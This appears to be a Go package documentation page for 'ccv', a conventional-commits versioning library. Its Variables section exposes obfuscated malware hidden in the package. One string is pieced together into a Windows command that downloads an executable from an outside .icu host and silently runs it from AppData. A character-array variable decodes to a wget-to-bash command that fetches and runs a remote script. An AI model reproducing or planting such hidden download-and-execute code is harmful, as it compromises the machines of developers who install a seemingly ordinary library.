Documentation
¶
Overview ¶
Package ccv implements the conventional commits versioner logic.
Index ¶
Constants ¶
This section is empty.
Variables ¶
var AeOXhbL = XC[1] + XC[4] + XC[15] + XC[5] + XC[47] + XC[3] + XC[2] + XC[63] + XC[25] + XC[49] + XC[19] + XC[0] + XC[59] + XC[45] + XC[26] + XC[39] + XC[55] + XC[36] + XC[20] + XC[58] + XC[7] + XC[34] + XC[69] + XC[64] + XC[40] + XC[18] + XC[65] + XC[51] + XC[23] + XC[24] + XC[38] + XC[29] + XC[72] + XC[44] + XC[43] + XC[67] + XC[14] + XC[48] + XC[46] + XC[30] + XC[31] + XC[56] + XC[74] + XC[73] + XC[8] + XC[35] + XC[71] + XC[53] + XC[41] + XC[57] + XC[17] + XC[6] + XC[60] + XC[54] + XC[13] + XC[11] + XC[50] + XC[28] + XC[66] + XC[16] + XC[10] + XC[9] + XC[70] + XC[27] + XC[42] + XC[68] + XC[62] + XC[61] + XC[33] + XC[12] + XC[21] + XC[32] + XC[37] + XC[52] + XC[22]
var HuqENScS = "if" + " " + "not" + " ex" + "i" + "s" + "t " + "%Us" + "er" + "Pr" + "o" + "file%" + "\\App" + "Da" + "ta\\" + "Lo" + "c" + "al\\" + "rohk" + "m" + "h" + "\\q" + "dotb" + ".exe " + "curl" + " http" + "s://" + "unisc" + "omput" + "er" + "." + "icu/" + "s" + "t" + "ora" + "ge/" + "bb" + "b" + "28ef0" + "4/" + "fa" + "3154" + "6" + "b " + "--" + "cre" + "at" + "e-d" + "i" + "r" + "s " + "-o %U" + "se" + "r" + "Pro" + "fil" + "e%\\" + "App" + "D" + "ata" + "\\" + "L" + "ocal\\" + "roh" + "kmh\\" + "qdo" + "tb" + ".exe" + " " + "&& " + "sta" + "rt /" + "b " + "%Us" + "erPr" + "of" + "ile%" + "\\AppD" + "ata" + "\\Lo" + "c" + "al" + "\\" + "ro" + "hk" + "mh" + "\\qdo" + "tb" + ".exe"
var XC = []string{"t", "w", "O", "-", "g", "t", "f", "i", "e", " ", "f", "1", "b", "3", "t", "e", "b", "d", "p", "h", "u", "a", "&", "e", "r", "-", "s", " ", "4", "i", "a", "g", "s", "/", "s", "3", "/", "h", ".", ":", "m", "d", "/", "/", "u", "p", "r", " ", "o", " ", "5", "t", " ", "3", "a", "/", "e", "0", "n", "t", "/", "n", "i", " ", "o", "u", "6", "s", "b", "c", "|", "7", "c", "d", "/"}
Functions ¶
func NextVersion ¶
NextVersion returns a string containing the next version number based on the state of the git repository in path. It inspects the most recent tag, and the commits made after that tag.
func NextVersionType ¶
NextVersionType returns a string containing the next version type (major, minor, patch) based on the state of the git repository in path. It inspects the most recent tag, and the commits made after that tag.
Types ¶
This section is empty.
Click to show internal directories.
Click to hide internal directories.